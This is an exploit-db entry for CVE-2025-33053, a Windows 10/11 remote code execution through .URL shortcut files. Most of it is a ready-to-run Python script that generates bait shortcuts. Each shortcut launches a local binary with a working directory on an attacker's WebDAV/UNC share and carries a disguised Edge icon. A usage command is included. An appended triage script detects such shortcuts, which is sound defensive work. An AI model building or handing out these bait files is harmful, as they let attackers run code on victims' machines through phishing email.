[remote] WebDAV Windows 10 - Remote Code Execution (RCE)
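This vulnerability abuses the behavior of Windows .URL files: when the victim opens or previews the file, code is executed remotely via a UNC/WebDAV path, with no user interaction required. 2025-6-15 00:0:0 Author: www.exploit-db.com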

Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. a WebDAV or SMB share), leading to arbitrary code
execution without a prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

```python
import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")

    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()
```
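A triage check for the shortcut layout shown above, as an added example that is not part of the original exploit-db entry: it parses the `[InternetShortcut]` section and rates a file `high` when a local executable in `URL` is paired with a UNC/WebDAV `WorkingDirectory`. The function names, severity labels and sample files are assumptions made for this example.

```python
import re

# \\host\share, including WebDAV forms such as \\host@SSL@443\DavWWWRoot\share
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\/@]+)(?:@[^\\/]*)?(?:[\\/]|$)")
# A local drive path ending in an executable extension, e.g. C:\...\tool.exe
LOCAL_EXE_RE = re.compile(r"^(?:file:///)?[A-Za-z]:[\\/].*\.(?:exe|com|scr|bat|cmd)$", re.I)


def parse_internet_shortcut(text):
    """Return the keys of the [InternetShortcut] section, names lower-cased."""
    keys, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and "=" in line and not line.startswith(";"):
            name, value = line.split("=", 1)
            keys[name.strip().lower()] = value.strip()
    return keys


def assess_shortcut(text):
    """Rate a .url file 'high', 'medium' or 'none' and list its remote hosts."""
    keys = parse_internet_shortcut(text)
    remote = {}
    for name, value in keys.items():
        match = UNC_RE.match(value)
        if match:
            remote[name] = match.group("host")
    if "workingdirectory" in remote and LOCAL_EXE_RE.match(keys.get("url", "")):
        severity = "high"    # local binary started with a remote working directory
    elif remote:
        severity = "medium"  # some other key references a remote UNC host
    else:
        severity = "none"
    return {"severity": severity, "remote": remote}


# Constructed samples (192.0.2.10 is a documentation address, not from the page)
SUSPICIOUS = r"""[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.0.2.10\webdav\\
ShowCommand=7
"""
BENIGN = "[InternetShortcut]\nURL=https://example.com/\nIconIndex=0\n"

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, assess_shortcut(sample))
```

The same check can be run over `.url` attachments at a mail gateway or over files found in user download and temp directories.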
            

Source: https://www.exploit-db.com/exploits/52334